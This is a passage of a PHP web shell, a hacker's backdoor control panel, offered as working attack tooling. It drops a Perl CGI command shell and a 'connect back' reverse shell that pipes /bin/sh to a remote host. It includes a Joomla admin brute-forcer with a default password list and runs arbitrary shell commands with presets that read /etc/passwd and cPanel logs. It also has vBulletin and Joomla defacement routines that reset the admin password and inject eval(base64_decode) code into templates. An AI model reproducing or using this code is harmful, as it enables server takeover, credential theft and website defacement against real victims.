PrintDownloadLinkPage\n{\n\tlocal(\$FileUrl) = @_;\n\tif(-e \$FileUrl) # if the file exists\n\t{\n\t\t# encode the file link so we can send it to the browser\n\t\t\$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack(\"H*\",\$1)/eg;\n\t\t\$DownloadLink = \"\$ScriptLocation?a=download&f=\$FileUrl&o=go\";\n\t\t\$HtmlMetaHeader = \"<meta HTTP-EQUIV=\\\"Refresh\\\" CONTENT=\\\"1; URL=\$DownloadLink\\\">\";\n\t\t&PrintPageHeader(\"c\");\n\t\tprint <<END;\n<code>\nSending File \$TransferFile...<br>\nIf the download does not start automatically,\n<a href=\"\$DownloadLink\">Click Here</a>.\n</code>\nEND\n\t\t&PrintCommandLineInputForm;\n\t\t&PrintPageFooter;\n\t}\n\telse # file doesn't exist\n\t{\n\t\t&PrintPageHeader(\"f\");\n\t\tprint \"<code>Failed to download \$FileUrl: \$!</code>\";\n\t\t&PrintFileDownloadForm;\n\t\t&PrintPageFooter;\n\t}\n}\n\n#------------------------------------------------------------------------------\n# This function reads the specified file from the disk and sends it to the\n# browser, so that it can be downloaded by the user.\n# Argument 1: Fully qualified pathname of the file to be sent.\n#------------------------------------------------------------------------------\nsub SendFileToBrowser\n{\n\tlocal(\$SendFile) = @_;\n\tif(open(SENDFILE, \$SendFile)) # file opened for reading\n\t{\n\t\tif(\$WinNT)\n\t\t{\n\t\t\tbinmode(SENDFILE);\n\t\t\tbinmode(STDOUT);\n\t\t}\n\t\t\$FileSize = (stat(\$SendFile))[7];\n\t\t(\$Filename = \$SendFile) =~  m!([^/^\\\\]*)\$!;\n\t\tprint \"Content-Type: application/x-unknown\\n\";\n\t\tprint \"Content-Length: \$FileSize\\n\";\n\t\tprint \"Content-Disposition: attachment; filename=\$1\\n\\n\";\n\t\tprint while(<SENDFILE>);\n\t\tclose(SENDFILE);\n\t}\n\telse # failed to open file\n\t{\n\t\t&PrintPageHeader(\"f\");\n\t\tprint \"<code>Failed to download \$SendFile: \$!</code>\";\n\t\t&PrintFileDownloadForm;\n\t\t&PrintPageFooter;\n\t}\n}\n\n\n#------------------------------------------------------------------------------\n# This function is called when the user downloads a file. It displays a message\n# to the user and provides a link through which the file can be downloaded.\n# This function is also called when the user clicks on that link. In this case,\n# the file is read and sent to the browser.\n#------------------------------------------------------------------------------\nsub BeginDownload\n{\n\t# get fully qualified path of the file to be downloaded\n\tif((\$WinNT & (\$TransferFile =~ m/^\\\\|^.:/)) |\n\t\t(!\$WinNT & (\$TransferFile =~ m/^\\//))) # path is absolute\n\t{\n\t\t\$TargetFile = \$TransferFile;\n\t}\n\telse # path is relative\n\t{\n\t\tchop(\$TargetFile) if(\$TargetFile = \$CurrentDir) =~ m/[\\\\\\/]\$/;\n\t\t\$TargetFile .= \$PathSep.\$TransferFile;\n\t}\n\n\tif(\$Options eq \"go\") # we have to send the file\n\t{\n\t\t&SendFileToBrowser(\$TargetFile);\n\t}\n\telse # we have to send only the link page\n\t{\n\t\t&PrintDownloadLinkPage(\$TargetFile);\n\t}\n}\n\n#------------------------------------------------------------------------------\n# This function is called when the user wants to upload a file. If the\n# file is not specified, it displays a form allowing the user to specify a\n# file, otherwise it starts the upload process.\n#------------------------------------------------------------------------------\nsub UploadFile\n{\n\t# if no file is specified, print the upload form again\n\tif(\$TransferFile eq \"\")\n\t{\n\t\t&PrintPageHeader(\"f\");\n\t\t&PrintFileUploadForm;\n\t\t&PrintPageFooter;\n\t\treturn;\n\t}\n\t&PrintPageHeader(\"c\");\n\n\t# start the uploading process\n\tprint \"<code>Uploading \$TransferFile to \$CurrentDir...<br>\";\n\n\t# get the fullly qualified pathname of the file to be created\n\tchop(\$TargetName) if (\$TargetName = \$CurrentDir) =~ m/[\\\\\\/]\$/;\n\t\$TransferFile =~ m!([^/^\\\\]*)\$!;\n\t\$TargetName .= \$PathSep.\$1;\n\n\t\$TargetFileSize = length(\$in{'filedata'});\n\t# if the file exists and we are not supposed to overwrite it\n\tif(-e \$TargetName && \$Options ne \"overwrite\")\n\t{\n\t\tprint \"Failed: Destination file already exists.<br>\";\n\t}\n\telse # file is not present\n\t{\n\t\tif(open(UPLOADFILE, \">\$TargetName\"))\n\t\t{\n\t\t\tbinmode(UPLOADFILE) if \$WinNT;\n\t\t\tprint UPLOADFILE \$in{'filedata'};\n\t\t\tclose(UPLOADFILE);\n\t\t\tprint \"Transfered \$TargetFileSize Bytes.<br>\";\n\t\t\tprint \"File Path: \$TargetName<br>\";\n\t\t}\n\t\telse\n\t\t{\n\t\t\tprint \"Failed: \$!<br>\";\n\t\t}\n\t}\n\tprint \"</code>\";\n\t&PrintCommandLineInputForm;\n\t&PrintPageFooter;\n}\n\n#------------------------------------------------------------------------------\n# This function is called when the user wants to download a file. If the\n# filename is not specified, it displays a form allowing the user to specify a\n# file, otherwise it displays a message to the user and provides a link\n# through  which the file can be downloaded.\n#------------------------------------------------------------------------------\nsub DownloadFile\n{\n\t# if no file is specified, print the download form again\n\tif(\$TransferFile eq \"\")\n\t{\n\t\t&PrintPageHeader(\"f\");\n\t\t&PrintFileDownloadForm;\n\t\t&PrintPageFooter;\n\t\treturn;\n\t}\n\t\n\t# get fully qualified path of the file to be downloaded\n\tif((\$WinNT & (\$TransferFile =~ m/^\\\\|^.:/)) |\n\t\t(!\$WinNT & (\$TransferFile =~ m/^\\//))) # path is absolute\n\t{\n\t\t\$TargetFile = \$TransferFile;\n\t}\n\telse # path is relative\n\t{\n\t\tchop(\$TargetFile) if(\$TargetFile = \$CurrentDir) =~ m/[\\\\\\/]\$/;\n\t\t\$TargetFile .= \$PathSep.\$TransferFile;\n\t}\n\n\tif(\$Options eq \"go\") # we have to send the file\n\t{\n\t\t&SendFileToBrowser(\$TargetFile);\n\t}\n\telse # we have to send only the link page\n\t{\n\t\t&PrintDownloadLinkPage(\$TargetFile);\n\t}\n}\n\n#------------------------------------------------------------------------------\n# Main Program - Execution Starts Here\n#------------------------------------------------------------------------------\n&ReadParse;\n&GetCookies;\n\n\$ScriptLocation = \$ENV{'SCRIPT_NAME'};\n\$ServerName = \$ENV{'SERVER_NAME'};\n\$LoginPassword = \$in{'p'};\n\$RunCommand = \$in{'c'};\n\$TransferFile = \$in{'f'};\n\$Options = \$in{'o'};\n\n\$Action = \$in{'a'};\n\$Action = \"login\" if(\$Action eq \"\"); # no action specified, use default\n\n# get the directory in which the commands will be executed\n\$CurrentDir = \$in{'d'};\nchop(\$CurrentDir = `\$CmdPwd`) if(\$CurrentDir eq \"\");\n\n\$LoggedIn = \$Cookies{'SAVEDPWD'} eq \$Password;\n\nif(\$Action eq \"login\" || !\$LoggedIn) # user needs/has to login\n{\n\t&PerformLogin;\n}\nelsif(\$Action eq \"command\") # user wants to run a command\n{\n\t&ExecuteCommand;\n}\nelsif(\$Action eq \"upload\") # user wants to upload a file\n{\n\t&UploadFile;\n}\nelsif(\$Action eq \"download\") # user wants to download a file\n{\n\t&DownloadFile;\n}\nelsif(\$Action eq \"logout\") # user wants to logout\n{\n\t&PerformLogout;\n}\n");
        fclose($file);
        chmod("izo.cin", 0755);
        $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
YXRhY2hlZFxuXG4iOw==';
        $file = fopen("dc.pl", "w+");
        $write = fwrite($file, "#!/usr/bin/perl\r\n      use Socket;\r\n      print \"Data Cha0s Connect Back Backdoor\\n\\n\";\r\n      if (!\$ARGV[0]) {\r\n        printf \"Usage: \$0 [Host] <Port>\\n\";\r\n        exit(1);\r\n      }\r\n      print \"[*] Dumping Arguments\\n\";\r\n      \$host = \$ARGV[0];\r\n      \$port = 80;\r\n      if (\$ARGV[1]) {\r\n        \$port = \$ARGV[1];\r\n      }\r\n      print \"[*] Connecting...\\n\";\r\n      \$proto = getprotobyname('tcp') || die(\"Unknown Protocol\\n\");\r\n      socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die (\"Socket Error\\n\");\r\n      my \$target = inet_aton(\$host);\r\n      if (!connect(SERVER, pack \"SnA4x8\", 2, \$port, \$target)) {\r\n        die(\"Unable to Connect\\n\");\r\n      }\r\n      print \"[*] Spawning Shell\\n\";\r\n      if (!fork( )) {\r\n        open(STDIN,\">&SERVER\");\r\n        open(STDOUT,\">&SERVER\");\r\n        open(STDERR,\">&SERVER\");\r\n        exec {'/bin/sh'} '-bash' . \"\\0\" x 4;\r\n        exit(0);\r\n      }\r\n      print \"[*] Datached\\n\\n\";");
        fclose($file);
        chmod("dc.pl", 0755);
        echo "<iframe src=cgitelnet1/izo.cin width=96% height=90% frameborder=0></iframe> \r\n\r\n \r\n </div>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'jbrute') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=jbrute" method="post">

	<meta name="author" content="RetnOHacK" />
    <meta name="keywords" content="Joomla, Bruter, JoomlaBruter, JoomlaBruterForce, JoomlaBruterForceOnline" />
    <meta name="description" content="RetnOHacK #Procoder'z Team Albanian" />
<center>
</br></br>
<center><b><font color="lime">+--=[ Joomla Bruter Force ]=--+</font></b><br /><br />
<form method="post" action="" enctype="multipart/form-data"> 
<table class="tabnet" width="38%" border="0"><center>
<th colspan="2">Joomla Brute Force</th>
<tr><td><p ><font  class="d1">User :</font></th>
<input class="inputz" type='text' name="usr" value="admin" size="15"> </font></center><br /><br /></p>
</td></tr>
<tr><td><font class="">Sites list :</font> 
</td><td><font class="" >Pass list :</font></td></tr>
<tr>
		<td>
<textarea name="sites" style="background:black;" cols="40" rows="13" ></textarea>
</td><td>
<textarea name="w0rds" style="background:black;" cols="40" rows="13" >
admin
123456
password
102030
123123
12345
123456789
pass
test
admin123
demo
!@#$%^
</textarea>
</td></tr><center><tr><td>
<font > 
<input class="inputzbut" type="submit" name="x" value="start" id="d4"> 
</font></td></tr><br>
tanks for procoder'z team albanian<br></center></table>
</form></center>
<?php 
        @set_time_limit(0);
        if ($_POST['x']) {
            echo "<hr>";
            $sites = explode("\n", $_POST["sites"]);
            // Get Sites
            $w0rds = explode("\n", $_POST["w0rds"]);
            // Get w0rdLiSt
            $Attack = new Joomla_brute_Force();
            // Active Class
            foreach ($w0rds as $pwd) {
                foreach ($sites as $site) {
                    $Attack->check_it(txt_cln($site), $_POST['usr'], txt_cln($pwd));
                    // Brute :D
                    flush();
                    flush();
                }
            }
        }
        # Class & Function'z
        function txt_cln($value)
        {
            return str_replace(array("\n", "\r"), "", $value);
        }
        class Joomla_brute_Force
        {
            public function check_it($site, $user, $pass)
            {
                // print result
                if (eregi('com_config', $this->post($site, $user, $pass))) {
                    echo "<span class=\"x2\"><b># Success : {$user}:{$pass} -> <a href='{$site}/administrator/index.php'>{$site}/administrator/index.php</a></b></span><BR>";
                    $f = fopen("Result.txt", "a+");
                    fwrite($f, "Success ~~ {$user}:{$pass} -> {$site}/administrator/index.php\n");
                    fclose($f);
                    flush();
                } else {
                    echo "# Failed : {$user}:{$pass} -> {$site}<BR>";
                    flush();
                }
            }
            public function post($site, $user, $pass)
            {
                // Post -> user & pass
                $token = $this->extract_token($site);
                $curl = curl_init();
                curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($curl, CURLOPT_URL, $site . "/administrator/index.php");
                @curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
                @curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
                curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
                @curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
                curl_setopt($curl, CURLOPT_POST, 1);
                curl_setopt($curl, CURLOPT_POSTFIELDS, 'username=' . $user . '&passwd=' . $pass . '&lang=en-GB&option=com_login&task=login&' . $token . '=1');
                curl_setopt($curl, CURLOPT_TIMEOUT, 20);
                $exec = curl_exec($curl);
                curl_close($curl);
                return $exec;
            }
            public function extract_token($site)
            {
                // get token from source for -> function post
                $source = $this->get_source($site);
                preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si", $source, $token);
                return $token[1][0];
            }
            public function get_source($site)
            {
                // get source for -> function extract_token
                $curl = curl_init();
                curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($curl, CURLOPT_URL, $site . "/administrator/index.php");
                @curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
                @curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
                curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
                @curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
                curl_setopt($curl, CURLOPT_TIMEOUT, 20);
                $exec = curl_exec($curl);
                curl_close($curl);
                return $exec;
            }
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'vb') {
        ?>
   <form action="?y=<?php 
        echo $pwd;
        ?>&x=vb" method="post">
   <br><br><br><div align="center">
   <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
   <b><font color="#00FF00">+--=[ VB Index Changer ]=--+</font></b>
   </div><br>
   <?php 
        if (empty($_POST['index'])) {
            echo "<center><FORM method=\"POST\">";
            echo "<table class=\"tabnet\">\r\n<th colspan=\"2\">Vb Index Changer</th>\r\n<tr><td>host </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"localhost\" value=\"localhost\"></td></tr>\r\n<tr><td>database </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"database\" value=\"forum_vb\"></td></tr>\r\n<tr><td>username </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"username\" value=\"user_vb\"></td></tr>\r\n<tr><td>password </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"password\" value=\"vb\"></td></tr>\r\n</tr>\r\n<th colspan=\"2\">Your Index Code</th></table><table class=\"tabnet\">\r\n<TEXTAREA name=\"index\" rows=\"13\" style=\"background:black\" border=\"1\" cols=\"69\" name=\"code\">your index code</TEXTAREA><br>\r\n<INPUT class=\"inputzbut\" type=\"submit\" value=\"setting\" name=\"send\">\r\n</FORM></table></center>";
        } else {
            $localhost = $_POST['localhost'];
            $database = $_POST['database'];
            $username = $_POST['username'];
            $password = $_POST['password'];
            $index = $_POST['index'];
            @mysql_connect($localhost, $username, $password) or die(mysql_error());
            @mysql_select_db($database) or die(mysql_error());
            $index = str_replace("\\'", "'", $index);
            $set_index = "{\${eval(base64_decode(\\'";
            $set_index .= base64_encode("echo \"{$index}\";");
            $set_index .= "\\'))}}{\${exit()}}</textarea>";
            echo "UPDATE template SET template ='" . $set_index . "' ";
            $ok = @mysql_query("UPDATE template SET template ='" . $set_index . "'") or die(mysql_error());
            if ($ok) {
                echo "!! update finish !!<br><br>";
            }
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'bypass') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=bypass" method="post">

<?php 
        echo "<center/><br/><b><font color=#00ff00>-=[ Command  Bypass Exploit ]=-</font></b><br>\r\n";
        print_r('
<pre>
<form method="POST" action="">
<b><font color=#00ff00><b><font color="#00ff00">Command  :=) </font></font></b><input name="baba" type="text" class="inputz" size="34"><input type="submit" class="inputzbut" value="Go">
</form>
<form method="POST" action=""><strong><b><font color="#00ff00">Menu Bypass  :=)  </font></strong><select name="liz0" size="1" class="inputz">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">netstat</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" class="inputzbut" value="G&ouml;">
</form>
</pre>
');
        ini_restore("safe_mode");
        ini_restore("open_basedir");
        $liz0 = shell_exec($_POST[baba]);
        $liz0zim = shell_exec($_POST[liz0]);
        $uid = shell_exec('id');
        $server = shell_exec('uname -a');
        echo "<pre><h4>";
        echo $liz0;
        echo $liz0zim;
        echo "</h4></pre>";
        "</div>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'jodexer') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=jodexer" method="post">

<?php 
        function randomt()
        {
            $chars = "abcdefghijkmnopqrstuvwxyz023456789";
            srand((double) microtime() * 1000000);
            $i = 0;
            $pass = '';
            while ($i <= 7) {
                $num = rand() % 33;
                $tmp = substr($chars, $num, 1);
                $pass .= $tmp;
                $i++;
            }
            return $pass;
        }
        function entre2v2($text, $marqueurDebutLien, $marqueurFinLien, $i = 1)
        {
            $ar0 = explode($marqueurDebutLien, $text);
            $ar1 = explode($marqueurFinLien, $ar0[$i]);
            $ar = trim($ar1[0]);
            return $ar;
        }
        if ($_POST['form_action']) {
            $text = file_get_contents($_POST['file']);
            $username = entre2v2($text, "public {$user} = '", "';");
            $password = entre2v2($text, "public {$password} = ', '", "';");
            $dbname = entre2v2($text, "public {$db} = ', '", "';");
            $dbprefix = entre2v2($text, "public {$dbprefix} = '", "';");
            $site_url = $_POST['site_url'];
            $h = "<?php  echo(stripslashes(base64_decode('" . urlencode(base64_encode(str_replace("'", "'", $_POST['code']))) . "'))); exit; ?>";
            $co = randomt();
            /*
            echo($username);
            echo("<br>");
            echo($password);
            echo("<br>");
            echo($dbname);
            echo("<br>");
            echo($dbprefix);
            echo("<br>");
            */
            $co = randomt();
            if ($_POST['form_action']) {
                $h = "<?php  echo(stripslashes(base64_decode('" . urlencode(base64_encode(str_replace("'", "'", $_POST['code']))) . "'))); exit; ?>";
                $link = mysql_connect("dzoed.druknet.bt", $username, $password);
                mysql_select_db($dbname, $link);
                $tryChaningInfo = mysql_query("UPDATE " . $dbprefix . "users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
                echo "<br>[+] Changing admin password to 123456789";
                $req = mysql_query("SELECT * from  `" . $dbprefix . "extensions` ");
                if ($req) {
                    #################################################################
                    ######################        V1.6         ######################
                    #################################################################
                    $req = mysql_query("SELECT * from  `" . $dbprefix . "template_styles` WHERE client_id='0' and home='1'");
                    $data = mysql_fetch_array($req);
                    $template_name = $data["template"];
                    $req = mysql_query("SELECT * from  `" . $dbprefix . "extensions` WHERE name='" . $template_name . "'");
                    $data = mysql_fetch_array($req);
                    $template_id = $data["extension_id"];
                    $url2 = $site_url . "/index.php";
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, $url2);
                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_HEADER, 1);
                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                    $buffer = curl_exec($ch);
                    $return = entre2v2($buffer, '<input type="hidden" name="return" value="', '"');
                    $hidden = entre2v2($buffer, '<input type="hidden" name="', '" value="1"', 4);
                    ///////////////////////////
                    $url2 = $site_url . "/index.php";
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, $url2);
                    curl_setopt($ch, CURLOPT_POST, 1);
                    curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123456789&option=com_login&task=login&return=" . $return . "&" . $hidden . "=1");
                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_HEADER, 0);
                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                    $buffer = curl_exec($ch);
                    $pos = strpos($buffer, "com_config");
                    if ($pos === false) {
                        echo "<br>[-] Login Error";
                        exit;
                    } else {
                        echo "<br>[~] Login Successful";
                    }
                    ///////////////////////////
                    $url2 = $site_url . "/index.php?option=com_templates&task=source.edit&id=" . base64_encode($template_id . ":index.php");
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, $url2);
                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_HEADER, 0);
                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                    $buffer = curl_exec($ch);
                    $hidden2 = entre2v2($buffer, '<input type="hidden" name="', '" value="1"', 2);
                    if ($hidden2) {
                        echo "<br>[+] index.php file founded in Theme Editor";
                    } else {
                        echo "<br>[-] index.php Not found in Theme Editor";
                        exit;
                    }
                    echo "<br>[*] Updating Index.php .....";
                    $url2 = $site_url . "/index.php?option=com_templates&layout=edit";
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, $url2);
                    curl_setopt($ch, CURLOPT_POST, 1);
                    curl_setopt($ch, CURLOPT_POSTFIELDS, "jform[source]=" . $h . "&jform[filename]=index.php&jform[extension_id]=" . $template_id . "&" . $hidden2 . "=1&task=source.save");
                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_HEADER, 0);
                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                    $buffer = curl_exec($ch);
                    $pos = strpos($buffer, '<dd class="message message">');
                    if ($pos === false) {
                        echo "<br>[-] Updating Index.php Error";
                        exit;
                    } else {
                        echo "<br>[~] index.php successfully saved";
                    }
                    #################################################################
                    ######################      V1.6  END      ######################
                    #################################################################
                } else {
                    #################################################################
                    ######################      V1.5           ######################
                    #################################################################
                    $req = mysql_query("SELECT * from  `" . $dbprefix . "templates_menu` WHERE client_id='0'");
                    $data = mysql_fetch_array($req);
                    $template_name = $data["template"];
                    $url2 = $site_url . "/index.php";
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, $url2);
                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_HEADER, 1);
                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                    $buffer = curl_exec($ch);
                    $hidden = entre2v2($buffer, '<input type="hidden" name="', '" value="1"', 3);
                    $url2 = $site_url . "/index.php";
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, $url2);
                    curl_setopt($ch, CURLOPT_POST, 1);
                    curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123456789&option=com_login&task=login&" . $hidden . "=1");
                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_HEADER, 0);
                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                    $buffer = curl_exec($ch);
                    $pos = strpos($buffer, "com_config");
                    if ($pos === false) {
                        echo "<br>[-] Login Error";
                        exit;
                    } else {
                        echo "<br>[+] Login Successful";
                    }
                    ///////////////////////////
                    $url2 = $site_url . "/index.php?option=com_templates&task=edit_source&client=0&id=" . $template_name;
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, $url2);
                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_HEADER, 0);
                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                    $buffer = curl_exec($ch);
                    $hidden2 = entre2v2($buffer, '<input type="hidden" name="', '" value="1"', 6);
                    if ($hidden2) {
                        echo "<br>[~] index.php file founded in Theme Editor";
                    } else {
                        echo "<br>[-] index.php Not found in Theme Editor";
                    }
                    echo "<br>[*] Updating Index.php .....";
                    $url2 = $site_url . "/index.php?option=com_templates&layout=edit";
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, $url2);
                    curl_setopt($ch, CURLOPT_POST, 1);
                    curl_setopt($ch, CURLOPT_POSTFIELDS, "filecontent=" . $h . "&id=" . $template_name . "&cid[]=" . $template_name . "&" . $hidden2 . "=1&task=save_source&client=0");
                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_HEADER, 0);
                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                    $buffer = curl_exec($ch);
                    $pos = strpos($buffer, '<dd class="message message fade">');
                    if ($pos === false) {
                        echo "<br>[-] Updating Index.php Error";
                        exit;
                    } else {
                        echo "<br>[~] index.php successfully saved";
                    }
                    #################################################################
                    ######################      V1.5  END      ######################
                    #################################################################
                }
            }
            function randomt()
            {
                $chars = "abcdefghijkmnopqrstuvwxyz023456789";
                srand((double) microtime() * 1000000);
                $i = 0;
                $pass = '';
                while ($i <= 7) {
                    $num = rand() % 33;
                    $tmp = substr($chars, $num, 1);
                    $pass .= $tmp;
                    $i++;
                }
                return $pass;
            }
            function entre2v2($text, $marqueurDebutLien, $marqueurFinLien, $i = 1)
            {
                $ar0 = explode($marqueurDebutLien, $text);
                $ar1 = explode($marqueurFinLien, $ar0[$i]);
                $ar = trim($ar1[0]);
                return $ar;
            }
        }
        ?>
    <center><br><br>
    <font color="#00ff00" size='+3'><b>+--=[ Automatic Joomla Index Changer ]=--+</b></font><br><br>
    </center>
    <center><b>
    Link of symlink configuration.php of Joomla<br></b>
    <FORM action=""  method="post">
    <input type="hidden" name="form_action" value="1">
     <input type="text" class="inputz" size="60" name="file" value="http://site.com/sym/home/user/public_html/configuration.php">
    <br>
    <br><b>
    Admin Control panel url</b><br>
    <input type="text" class="inputz" size="40" name="site_url" value="http://site/administrator"><br>
    <br><b>
    Your Index Code</b>
    <br>
    <TEXTAREA rows="20" align="center" style="background:black" cols="120" name="code"> your index code
            </TEXTAREA>
            <br>
    <INPUT  class="inputzbut" type="submit" value="Lets Go Deface !!!" name="Submit">
    </FORM>
     </center>
    <script language=JavaScript>m='%09%09%09%09%09%09%09%3C/td%3E%0A%09%09%09%09%09%09%3C/tr%3E%0A%09%09%09%09%09%3C/table%3E%0A%09%09%09%09%3C/td%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>
	<?php 
    } elseif (isset($_GET['x']) && $_GET['x'] == 'cgi2012') {
